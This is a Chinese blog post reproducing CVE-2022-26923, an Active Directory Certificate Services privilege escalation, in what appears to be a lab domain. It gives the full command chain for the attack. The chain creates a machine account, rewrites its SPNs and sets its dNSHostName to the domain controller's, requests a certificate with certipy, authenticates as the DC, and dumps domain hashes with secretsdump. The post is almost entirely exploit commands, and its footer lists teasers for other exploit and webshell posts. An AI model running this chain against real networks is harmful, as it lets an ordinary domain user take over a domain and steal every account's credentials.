2. 程式人生 > 其它 >【域滲透】CVE-2022–26923

【域滲透】CVE-2022–26923

阿新 發佈:2022-05-12

一、漏洞復現

新建機器賬號:

python3 addcomputer.py 'redteam.com/tony:PassWord@123' -method SAMR -computer-name 'TonyPC' -computer-pass 'pass.123' -dc-ip 192.168.172.201 

設定相關屬性:

https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1

PS C:\Users\tony\Desktop> Import-Module .\Import-ActiveDirectory.ps1
PS C:\Users\tony\Desktop> Import-ActiveDirectory
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -ServicePrincipalNames @{REPLACE="HOST/TonyPC","RestrictedKrbHost/TonyPC"} -Verbose
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName $null
PS C:\Users\tony\Desktop> Set-ADComputer TonyPC -DNSHostName dc.redteam.com

使用certipy請求證書:

─# certipy req 'redteam.com/TonyPC$:PassWord@[email protected]' -ca REDTEAM-DC-CA -template  Machine -debug

使用證書認證獲取DC hash:

certipy auth -pfx dc.pfx -dc-ip 192.168.172.201 

dump hash

python3 secretsdump.py 'redteam.com/[email protected]' -hashes :dd4390e7e449062d421301fef2c9ec7e

相關推薦

滲透CVE-202226923

一、漏洞復現 新建機器賬號: python3 addcomputer.py \'redteam.com/tony:PassWord@123\' -method SAMR -computer-name \'TonyPC\' -computer-pass \'pass.123\' -dc-ip 192.168.172.201 

滲透利用S4U2self提權

一、利用場景 當獲取內機器許可權,許可權為iis、Network Service等許可權,就可以利用S4u2Self進行許可權提升,儘管要在帳戶上專門啟用約束委派才能使用S4U2proxy 跨系統“使其工作”,但任何具有 SPN 的主體都可

漏洞復現CVE-2021-22205 GitLab 未授權RCE

0x00 漏洞簡介: 漏洞出來第一時間,聽漏洞澮測的朋友傳來的情報,就及時給了POC,但一直沒復現,只是簡單看了文章,提到需要可以註冊使用者才能進行攻擊,然後就感覺挺雞肋,沒有再繼續看。

漏洞復現CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

控時間同步問題

1問題 (1.1)控伺服器與網路時間不一致,控伺服器是utc時間,而我們中國一般是 utc+8:00

Photoshop下載photoshop 2022最新版更新內容(mac/win)

photoshop全球最大的影象處理軟體,Photoshop 2022可分為圖畫編輯、圖畫組成、校色調色及特效製造有些。圖畫編輯是圖畫處理的根底,可以對圖畫做各種變換如擴大、減小、旋轉、歪斜、映象、透視等。也可進行復制、去掉

漏洞分析Struts2-045分析(CVE-2017-5638)

struts2 - 045 一個還比較出名的漏洞,因為涉及到利用Gopher協議反彈shell,所以寫篇文章來簡單學習下這個漏洞。

Mac滲透測試之SQL注入Demo

目錄:   1 一、下載安裝sqlmap 1、官網地址:http://sqlmap.org/#download git下載: git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Spring-SecurityRe03 認證引數修改與跨跳轉處理

一、請求引數名設定 之前的表單資訊有一些要求: 1、action屬性發送的地址是Security設定的URL

AD組策略轉移組策略&可匯入的組策略

轉移組策略&可匯入的組策略環境: AD PDC 均為: Win2012 R2 客戶端:Win7 x64

復現CVE-2020-16898 TCP/IP遠端程式碼執行漏洞

EXP/POC看文末 簡述: CVE-2020-16898,又稱“Bad Neighbor” Windows TCP/IP堆疊不正確地處理ICMPv6 Router Advertisement資料包時,存在一個遠端執行程式碼漏洞。成功利用此漏洞的攻擊者可以獲得在目標伺服器或客戶

滲透淺談webshell隱藏

2019獨角獸企業重金招聘Python工程師標準>>> 跟我一起念後門口訣: 挑、改、藏、隱 來個例子先,例一:

C++語法C++中cout精度、寬、填充字元等的設定

C++中cout精度、寬、填充字元等的設定 #include <iostream> #include <iomanip>

Access-Control-Allow-Credentials‘ header in the response is 關於跨問題的個人記錄各種解決

技術標籤:javahttpvueweb 然後後端一般都是加上這個 response.setHeader("Access-Control-Allow-Origin", "*");

語音分析基於matlab語音短時時分析含Matlab原始碼 559期

一、簡介 語音訊號的時分析就是分析和提取語音訊號的時引數。進行語音分析時,最先接觸到並且也是最直觀的是它的時波形。語音訊號本身就是時訊號,因而時分析是最早使用,也是應用最廣泛的一種分析方法,這

語音分析基於matlab語音短時頻分析含Matlab原始碼 558期

一、簡介 原理 1 短時傅立葉變換 短時傅立葉分析(Short Time Fourier Analysis,STFA)適用於分析緩慢時變訊號的頻譜分析,在語音分析處理中已經得到廣泛應用。其方法是先將語音訊號分幀,再將各幀進行傅立葉變換。

語音處理基於matlab GUI語音時頻譜圖分析含Matlab原始碼 527期

一、簡介 時和頻是訊號的基本性質,這樣可以用多種方式來分析訊號,每種方式提供了不同的角度。解決問題的最快方式不一定是最明顯的方式,用來分析訊號的不同角度稱為。時可清楚反應訊號與互連線之間的相

開發日誌解決前後端分離架構開發時 Chrome samesite 跨問題 (基於 Vue 配置)

問題背景 由於專案使用前後端分離架構,開發時前端專案跑在一個伺服器,後端專案跑在另一個伺服器,所以存在跨問題。雖然通過 Spring 的配置也可以從後端解決跨存在的問題,

luogu P5787graph / 二分圖 /模板線段樹分治(擴充套件並查集)(線段樹分治)

有 n 個點,然後會加邊刪邊,然後每次操作後問你這個圖是否是二分圖。 graph / 二分圖 /模板線段樹分治

2022位元組跳動校招&社招&實習小說團隊

好故事,會發光 熱愛小說的你,也一樣 當一群小說愛好者聚在一起 致力於讓好故事影響更多人